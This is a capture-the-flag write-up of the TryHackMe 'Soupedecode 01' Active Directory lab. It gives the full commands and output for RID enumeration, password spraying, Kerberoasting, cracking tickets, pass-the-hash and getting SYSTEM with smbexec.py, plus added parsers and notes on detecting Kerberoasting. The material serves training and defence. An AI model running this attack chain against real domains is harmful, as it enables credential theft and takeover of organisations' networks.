TryHackMe: Soupedecode 01

Soupedecode 01 was a very simple Active Directory room. We began by enumerating a list of usernames via RID bruteforce and subsequently found valid credentials through password spraying. After that, using a Kerberoasting attack yielded credentials for a service account, granting access to an SMB share containing usernames and NTLM hashes. Finally, by spraying the hashes, we discovered the credentials of an administrator account on the Domain Controller (DC) and completed the room.

Tryhackme Room Link

Initial Enumeration

Nmap Scan

As usual, we start with a port scan.

$ nmap -T4 -n -sC -sV -Pn -p- 10.10.67.33
...
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-08-01 19:46:54Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2025-08-01T19:48:24+00:00; +3s from scanner time.
| ssl-cert: Subject: commonName=DC01.SOUPEDECODE.LOCAL
...
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

From the port scan, it seems we are dealing with a Domain Controller. We also learn the hostname and domain name, so we add them to our /etc/hosts file:

10.10.67.33 DC01.SOUPEDECODE.LOCAL SOUPEDECODE.LOCAL

Enumerating SMB Shares

Using nxc (netexec), we enumerate SMB shares and find that logging in as the guest user is permitted and grants us read access to the IPC$ share.

$ nxc smb dc01.soupedecode.local -u 'guest' -p '' --shares
SMB         10.10.67.33     445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB         10.10.67.33     445    DC01             [+] SOUPEDECODE.LOCAL\guest:
SMB         10.10.67.33     445    DC01             [*] Enumerated shares
SMB         10.10.67.33     445    DC01             Share           Permissions     Remark
SMB         10.10.67.33     445    DC01             -----           -----------     ------
SMB         10.10.67.33     445    DC01             ADMIN$                          Remote Admin
SMB         10.10.67.33     445    DC01             backup
SMB         10.10.67.33     445    DC01             C$                              Default share
SMB         10.10.67.33     445    DC01             IPC$            READ            Remote IPC
SMB         10.10.67.33     445    DC01             NETLOGON                        Logon server share
SMB         10.10.67.33     445    DC01             SYSVOL                          Logon server share
SMB         10.10.67.33     445    DC01             Users

Discovering Usernames

Leveraging our access to the IPC$ share, we can perform a RID bruteforce attack using nxc to enumerate domain users.

$ nxc smb dc01.soupedecode.local -u 'guest' -p '' --rid-brute 3000
SMB         10.10.67.33     445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB         10.10.67.33     445    DC01             [+] SOUPEDECODE.LOCAL\guest:
SMB         10.10.67.33     445    DC01             498: SOUPEDECODE\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.67.33     445    DC01             500: SOUPEDECODE\Administrator (SidTypeUser)
...
SMB         10.10.67.33     445    DC01             1000: SOUPEDECODE\DC01$ (SidTypeUser)
SMB         10.10.67.33     445    DC01             1101: SOUPEDECODE\DnsAdmins (SidTypeAlias)
SMB         10.10.67.33     445    DC01             1102: SOUPEDECODE\DnsUpdateProxy (SidTypeGroup)
SMB         10.10.67.33     445    DC01             1103: SOUPEDECODE\bmark0 (SidTypeUser)
...

We can also filter the output to create a clean list of usernames and save it to valid_usernames.txt. Note that the final cut on the space character keeps only the first word of each name, so an account name containing a space would be truncated; none of the accounts here do.

$ nxc smb dc01.soupedecode.local -u 'guest' -p '' --rid-brute 3000 | grep SidTypeUser | cut -d '\' -f 2 | cut -d ' ' -f 1 > valid_usernames.txt
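The grep/cut pipeline above is fine for this room, but it silently truncates any account name that contains a space and throws away the RID and object type. The following is an added Python parser (not part of the original write-up or of netexec) that turns the `--rid-brute` output into structured records so the exported list is exact; the sample lines are copied from the output shown above except the last one, which is constructed to show a user name with a space.

```python
import re
from typing import NamedTuple

# Sample nxc --rid-brute output. All lines but the last are copied from the
# output above; the last line is constructed to show a user name containing a
# space, which `cut -d ' ' -f 1` would shorten to "svc".
SAMPLE_OUTPUT = r"""
SMB         10.10.67.33     445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB         10.10.67.33     445    DC01             [+] SOUPEDECODE.LOCAL\guest:
SMB         10.10.67.33     445    DC01             498: SOUPEDECODE\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.67.33     445    DC01             500: SOUPEDECODE\Administrator (SidTypeUser)
SMB         10.10.67.33     445    DC01             1000: SOUPEDECODE\DC01$ (SidTypeUser)
SMB         10.10.67.33     445    DC01             1103: SOUPEDECODE\bmark0 (SidTypeUser)
SMB         10.10.67.33     445    DC01             1104: SOUPEDECODE\svc backup (SidTypeUser)
"""


class RidEntry(NamedTuple):
    rid: int
    domain: str
    name: str
    sid_type: str


# One RID line looks like "<rid>: <DOMAIN>\<name> (SidTypeXxx)". The name is
# matched non-greedily and the trailing "(SidType...)" token anchors the end,
# so names containing spaces are kept whole.
RID_LINE = re.compile(r"(\d+): ([^\\]+)\\(.+?) \((SidType\w+)\)\s*$")


def parse_rid_brute(text):
    """Return a RidEntry for every line that carries a RID result."""
    entries = []
    for line in text.splitlines():
        m = RID_LINE.search(line)
        if m:
            entries.append(RidEntry(int(m.group(1)), m.group(2), m.group(3), m.group(4)))
    return entries


def user_names(entries, include_machine_accounts=False):
    """Names of SidTypeUser objects; machine accounts (trailing $) are
    dropped unless asked for, since they are not spray candidates."""
    names = [e.name for e in entries if e.sid_type == "SidTypeUser"]
    if not include_machine_accounts:
        names = [n for n in names if not n.endswith("$")]
    return names


if __name__ == "__main__":
    found = parse_rid_brute(SAMPLE_OUTPUT)
    print("\n".join(user_names(found)))
```

From the defender's side, the finding here is not the parser but the fact that a guest session can walk the RID space at all; the same enumeration is what an anonymous-to-DC restriction (RestrictAnonymous / disabling the Guest account, which is the Windows default) is meant to stop.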

User Flag

Password Spraying

With the list of valid usernames, we first try ASREPRoasting, but no accounts are vulnerable. Standard password spraying with common passwords (e.g., the domain name, seasons, years) is also unsuccessful. However, another common weak password choice is for a user to set their password to their username. By attempting to authenticate each user with their own username as the password, we identify valid credentials for the user ybob317.

$ nxc smb dc01.soupedecode.local -u valid_usernames.txt -p valid_usernames.txt --no-bruteforce --continue-on-success
SMB         10.10.67.33     445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB         10.10.67.33     445    DC01             [-] SOUPEDECODE.LOCAL\Administrator:Administrator STATUS_LOGON_FAILURE
SMB         10.10.67.33     445    DC01             [-] SOUPEDECODE.LOCAL\Guest:Guest STATUS_LOGON_FAILURE
SMB         10.10.67.33     445    DC01             [-] SOUPEDECODE.LOCAL\krbtgt:krbtgt STATUS_LOGON_FAILURE
SMB         10.10.67.33     445    DC01             [-] SOUPEDECODE.LOCAL\DC01$:DC01$ STATUS_LOGON_FAILURE
SMB         10.10.67.33     445    DC01             [-] SOUPEDECODE.LOCAL\bmark0:bmark0 STATUS_LOGON_FAILURE
...
SMB         10.10.67.33     445    DC01             [+] SOUPEDECODE.LOCAL\ybob317:ybob317
...

As the ybob317 user, we have read access to the Users share, which we can connect to using smbclient.py and retrieve the user flag from \\dc01.soupedecode.local\Users\ybob317\Desktop\user.txt.

$ nxc smb dc01.soupedecode.local -u 'ybob317' -p 'ybob317' --shares
SMB         10.10.67.33     445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB         10.10.67.33     445    DC01             [+] SOUPEDECODE.LOCAL\ybob317:ybob317
SMB         10.10.67.33     445    DC01             [*] Enumerated shares
SMB         10.10.67.33     445    DC01             Share           Permissions     Remark
SMB         10.10.67.33     445    DC01             -----           -----------     ------
SMB         10.10.67.33     445    DC01             ADMIN$                          Remote Admin
SMB         10.10.67.33     445    DC01             backup
SMB         10.10.67.33     445    DC01             C$                              Default share
SMB         10.10.67.33     445    DC01             IPC$            READ            Remote IPC
SMB         10.10.67.33     445    DC01             NETLOGON        READ            Logon server share
SMB         10.10.67.33     445    DC01             SYSVOL          READ            Logon server share
SMB         10.10.67.33     445    DC01             Users           READ

$ smbclient.py 'SOUPEDECODE.LOCAL/ybob317:ybob317@dc01.soupedecode.local'

# use Users
# cd ybob317/Desktop
# ls
drw-rw-rw-          0  Fri Jul 25 17:51:44 2025 .
drw-rw-rw-          0  Mon Jun 17 17:24:32 2024 ..
-rw-rw-rw-        282  Mon Jun 17 17:24:32 2024 desktop.ini
-rw-rw-rw-         33  Fri Jul 25 17:51:44 2025 user.txt
# get user.txt

Root Flag

Kerberoasting

With valid domain credentials, we check for Kerberoastable accounts using GetUserSPNs.py:

$ GetUserSPNs.py -request -outputfile kerberoastables.txt 'SOUPEDECODE.LOCAL/ybob317:ybob317'

ServicePrincipalName    Name            MemberOf  PasswordLastSet             LastLogon  Delegation
----------------------  --------------  --------  --------------------------  ---------  ----------
FTP/FileServer          file_svc                  2024-06-17 17:32:23.726085  <never>
FW/ProxyServer          firewall_svc              2024-06-17 17:28:32.710125  <never>
HTTP/BackupServer       backup_svc                2024-06-17 17:28:49.476511  <never>
HTTP/WebServer          web_svc                   2024-06-17 17:29:04.569417  <never>
HTTPS/MonitoringServer  monitoring_svc            2024-06-17 17:29:18.511871  <never>

Now, using either hashcat or john, we attempt to crack the hashes with the rockyou.txt wordlist and successfully discover the password for the file_svc account.

$ hashcat kerberoastables.txt /usr/share/wordlists/rockyou.txt

$ hashcat kerberoastables.txt --show
$krb5tgs$23$*file_svc$SOUPEDECODE.LOCAL$SOUPEDECODE.LOCAL/file_svc*$d66d...73b6:Pa[REDACTED]!!
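The `23` in the `$krb5tgs$23$` prefix is the Kerberos encryption type of the ticket: 23 is RC4-HMAC, which is keyed directly from the account's NT hash and is what makes the ticket cheap to crack offline. On the DC the same request shows up as Event ID 4769 with Ticket Encryption Type 0x17, and the five tickets requested in one go are a second signal that does not depend on RC4 at all. The following is an added Python example (not from the original post) that reads the etype out of a hash line and applies both rules to constructed 4769-style records; the field names are the example's own and the client addresses and extra account are made up.

```python
import re
from collections import defaultdict

# Kerberos encryption type numbers as they appear in the 4769 "Ticket
# Encryption Type" field and in the $krb5tgs$<etype>$ hash prefix.
ETYPE_NAMES = {0x17: "RC4-HMAC",
               0x11: "AES128-CTS-HMAC-SHA1-96",
               0x12: "AES256-CTS-HMAC-SHA1-96"}

KRB5TGS_PREFIX = re.compile(r"^\$krb5tgs\$(\d+)\$")


def hash_etype(line):
    """Return (etype, name) for a $krb5tgs$ line like the hashcat output
    above, or None if the line is not one."""
    m = KRB5TGS_PREFIX.match(line.strip())
    if not m:
        return None
    etype = int(m.group(1))
    return etype, ETYPE_NAMES.get(etype, "unknown")


def constructed_4769_events():
    """Constructed records shaped like Event ID 4769 (Kerberos service ticket
    requested). Field names are this example's own; the client addresses and
    the jdoe1 account are made up."""
    events = []
    # One user requests RC4 tickets for the five SPN-bearing accounts listed
    # above, which is the footprint GetUserSPNs.py -request leaves behind.
    for svc in ["file_svc", "firewall_svc", "backup_svc", "web_svc", "monitoring_svc"]:
        events.append({"account": "ybob317", "service": svc,
                       "etype": 0x17, "client": "10.10.14.5"})
    # Ordinary activity: a workstation gets AES tickets for the DC and the TGS.
    events.append({"account": "jdoe1", "service": "DC01$", "etype": 0x12, "client": "10.10.20.7"})
    events.append({"account": "jdoe1", "service": "krbtgt", "etype": 0x12, "client": "10.10.20.7"})
    return events


EVENTS = constructed_4769_events()


def is_roastable_target(service):
    # Machine accounts (trailing $) have long random passwords and krbtgt is
    # the TGS itself, so neither is excluded from the baseline for nothing:
    # tickets for them are routine and would drown the signal.
    return not service.endswith("$") and service.lower() != "krbtgt"


def detect_kerberoast(events, min_services=3):
    """Two rules over 4769 records:
    rc4_requests    - every RC4 (0x17) ticket issued for a user-type service
                      account; in an AES-capable domain this should be rare.
    bulk_requesters - {account: services} for requesters that obtained tickets
                      to at least `min_services` distinct service accounts,
                      whatever the encryption type."""
    rc4_requests = [e for e in events
                    if e["etype"] == 0x17 and is_roastable_target(e["service"])]
    services_by_requester = defaultdict(set)
    for e in events:
        if is_roastable_target(e["service"]):
            services_by_requester[e["account"]].add(e["service"])
    bulk_requesters = {a: s for a, s in services_by_requester.items()
                       if len(s) >= min_services}
    return {"rc4_requests": rc4_requests, "bulk_requesters": bulk_requesters}


if __name__ == "__main__":
    print(hash_etype("$krb5tgs$23$*file_svc$SOUPEDECODE.LOCAL$SOUPEDECODE.LOCAL/file_svc*$d66d...73b6"))
    result = detect_kerberoast(EVENTS)
    print(f"{len(result['rc4_requests'])} RC4 service tickets; bulk requesters: {result['bulk_requesters']}")
```

The corresponding hardening is to make the service accounts refuse RC4 (msDS-SupportedEncryptionTypes set to AES only) so a requested ticket comes back as `$krb5tgs$18$` and costs far more per guess, and to give the accounts long random passwords or convert them to group managed service accounts, which rotate the password automatically; the detection above still fires on the bulk-request rule once RC4 is gone.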

Accessing the Backup Share

With the file_svc account, we re-enumerate SMB shares and discover that we now have read access to the backup share.

$ nxc smb dc01.soupedecode.local -u 'file_svc' -p 'Pa[REDACTED]!!' --shares
SMB         10.10.67.33     445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB         10.10.67.33     445    DC01             [+] SOUPEDECODE.LOCAL\file_svc:Pa[REDACTED]!!
SMB         10.10.67.33     445    DC01             [*] Enumerated shares
SMB         10.10.67.33     445    DC01             Share           Permissions     Remark
SMB         10.10.67.33     445    DC01             -----           -----------     ------
SMB         10.10.67.33     445    DC01             ADMIN$                          Remote Admin
SMB         10.10.67.33     445    DC01             backup          READ
SMB         10.10.67.33     445    DC01             C$                              Default share
SMB         10.10.67.33     445    DC01             IPC$            READ            Remote IPC
SMB         10.10.67.33     445    DC01             NETLOGON        READ            Logon server share
SMB         10.10.67.33     445    DC01             SYSVOL          READ            Logon server share
SMB         10.10.67.33     445    DC01             Users

Checking the share, we find a single text file named backup_extract.txt inside:

$ smbclient.py 'SOUPEDECODE.LOCAL/file_svc:Pa[REDACTED]!!@dc01.soupedecode.local'

# use backup
# ls
drw-rw-rw-          0  Mon Jun 17 17:41:17 2024 .
drw-rw-rw-          0  Fri Jul 25 17:51:20 2025 ..
-rw-rw-rw-        892  Mon Jun 17 17:41:23 2024 backup_extract.txt
# get backup_extract.txt

The file contains a list of account names and their corresponding NTLM hashes.

$ cat backup_extract.txt
WebServer$:2119:aad3b435b51404eeaad3b435b51404ee:c47b45f5d4df5a494bd19f13e14f7902:::
DatabaseServer$:2120:aad3b435b51404eeaad3b435b51404ee:406b424c7b483a42458bf6f545c936f7:::
CitrixServer$:2122:aad3b435b51404eeaad3b435b51404ee:48fc7eca9af236d7849273990f6c5117:::
FileServer$:2065:aad3b435b51404eeaad3b435b51404ee:e41d[REDACTED]5559:::
MailServer$:2124:aad3b435b51404eeaad3b435b51404ee:46a4655f18def136b3bfab7b0b4e70e3:::
BackupServer$:2125:aad3b435b51404eeaad3b435b51404ee:46a4655f18def136b3bfab7b0b4e70e3:::
ApplicationServer$:2126:aad3b435b51404eeaad3b435b51404ee:8cd90ac6cba6dde9d8038b068c17e9f5:::
PrintServer$:2127:aad3b435b51404eeaad3b435b51404ee:b8a38c432ac59ed00b2a373f4f050d28:::
ProxyServer$:2128:aad3b435b51404eeaad3b435b51404ee:4e3f0bb3e5b6e3e662611b1a87988881:::
MonitoringServer$:2129:aad3b435b51404eeaad3b435b51404ee:48fc7eca9af236d7849273990f6c5117:::

Hash Spraying

We parse the file to create separate lists for usernames and NTLM hashes.

$ cat backup_extract.txt | cut -d ':' -f 1 > backup_extract_users.txt
$ cat backup_extract.txt | cut -d ':' -f 4 > backup_extract_hashes.txt
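The two `cut` pipelines above work because `--no-bruteforce` pairs the lists line by line; a blank or malformed line in the dump would shift one list against the other without any error. The following is an added Python parser (not from the original post) for the user:rid:lm:nt::: format that rejects bad lines instead, and, from the auditor's side, reports the two findings a reviewer of such a dump should raise: accounts sharing an NT hash (identical passwords) and accounts that still have an LM hash stored. The input is the file shown above with the redacted line omitted.

```python
from collections import defaultdict
from typing import NamedTuple

# Contents of backup_extract.txt as shown above; the FileServer$ line is left
# out because its hash is redacted in the write-up.
BACKUP_EXTRACT = """\
WebServer$:2119:aad3b435b51404eeaad3b435b51404ee:c47b45f5d4df5a494bd19f13e14f7902:::
DatabaseServer$:2120:aad3b435b51404eeaad3b435b51404ee:406b424c7b483a42458bf6f545c936f7:::
CitrixServer$:2122:aad3b435b51404eeaad3b435b51404ee:48fc7eca9af236d7849273990f6c5117:::
MailServer$:2124:aad3b435b51404eeaad3b435b51404ee:46a4655f18def136b3bfab7b0b4e70e3:::
BackupServer$:2125:aad3b435b51404eeaad3b435b51404ee:46a4655f18def136b3bfab7b0b4e70e3:::
ApplicationServer$:2126:aad3b435b51404eeaad3b435b51404ee:8cd90ac6cba6dde9d8038b068c17e9f5:::
PrintServer$:2127:aad3b435b51404eeaad3b435b51404ee:b8a38c432ac59ed00b2a373f4f050d28:::
ProxyServer$:2128:aad3b435b51404eeaad3b435b51404ee:4e3f0bb3e5b6e3e662611b1a87988881:::
MonitoringServer$:2129:aad3b435b51404eeaad3b435b51404ee:48fc7eca9af236d7849273990f6c5117:::
"""

# This LM value is the constant dumps show when no LM hash is stored (LM
# storage disabled, which is the default on current Windows).
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"


class PwdumpEntry(NamedTuple):
    user: str
    rid: int
    lm: str
    nt: str


def parse_pwdump(text):
    """Parse user:rid:lmhash:nthash::: lines, raising on anything that is not
    a well-formed record so user and hash can never get out of step."""
    entries = []
    for n, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line:
            continue
        parts = line.split(":")
        if len(parts) < 4 or not parts[1].isdigit() or len(parts[3]) != 32:
            raise ValueError(f"line {n}: not a pwdump record: {line!r}")
        entries.append(PwdumpEntry(parts[0], int(parts[1]),
                                   parts[2].lower(), parts[3].lower()))
    return entries


def shared_nt_hashes(entries):
    """Map each NT hash used by more than one account to those accounts.
    Equal NT hashes mean equal passwords; for machine accounts, whose
    passwords Windows rotates randomly, that points at passwords set by hand."""
    by_hash = defaultdict(list)
    for e in entries:
        by_hash[e.nt].append(e.user)
    return {h: users for h, users in by_hash.items() if len(users) > 1}


def accounts_with_lm_hash(entries):
    """Accounts whose LM field is not the empty marker: LM hashes are trivially
    crackable and should not exist in a modern domain."""
    return [e.user for e in entries if e.lm != EMPTY_LM]


if __name__ == "__main__":
    dump = parse_pwdump(BACKUP_EXTRACT)
    print(f"{len(dump)} accounts parsed")
    for h, users in shared_nt_hashes(dump).items():
        print(f"shared NT hash {h}: {', '.join(users)}")
    print("LM hashes present:", accounts_with_lm_hash(dump) or "none")
```

Even on this small dump the reuse check finds two pairs of machine accounts with identical passwords, which is itself a sign that these computer accounts were provisioned with manual, reusable passwords rather than the automatic 120-character ones Windows generates.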

Now, spraying the hashes using nxc with the list of usernames and their corresponding hashes, we discover that the hash for the FileServer$ account is valid and grants us access.

$ nxc smb dc01.soupedecode.local -u backup_extract_users.txt -H backup_extract_hashes.txt --no-bruteforce --continue-on-success
SMB         10.10.67.33     445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
...
SMB         10.10.67.33     445    DC01             [+] SOUPEDECODE.LOCAL\FileServer$:e41d[REDACTED]5559 (Pwn3d!)
...

Administrator Access

The (Pwn3d!) tag in the nxc output indicates that the FileServer$ account has administrative privileges on the target, so we can use an impacket script such as smbexec.py to execute commands on the DC and read the root flag at C:\Users\Administrator\Desktop\root.txt to complete the room.

$ smbexec.py -hashes :e41d[REDACTED]5559 'SOUPEDECODE.LOCAL/FileServer$@dc01.soupedecode.local'

C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>type C:\Users\Administrator\Desktop\root.txt
27[REDACTED]6a

Alternatively, we could just retrieve the flag via SMB:

$ smbclient.py -hashes :e41d[REDACTED]5559 'SOUPEDECODE.LOCAL/FileServer$@dc01.soupedecode.local'

# use C$
# cd Users/Administrator/Desktop
# ls
drw-rw-rw-          0  Fri Jul 25 17:51:20 2025 .
drw-rw-rw-          0  Fri Aug  1 19:40:46 2025 ..
drw-rw-rw-          0  Mon Jun 17 17:41:17 2024 backup
-rw-rw-rw-        282  Sat Jun 15 17:54:32 2024 desktop.ini
-rw-rw-rw-         33  Fri Jul 25 17:51:20 2025 root.txt

Lastly, a quick check of the FileServer$ account’s group memberships shows it belongs to the Enterprise Admins group, explaining our administrative access.

C:\Windows\system32>powershell -c (Get-ADComputer "FileServer$" -Properties MemberOf).MemberOf
CN=Enterprise Admins,CN=Users,DC=SOUPEDECODE,DC=LOCAL

This post is licensed under CC BY 4.0 by the author.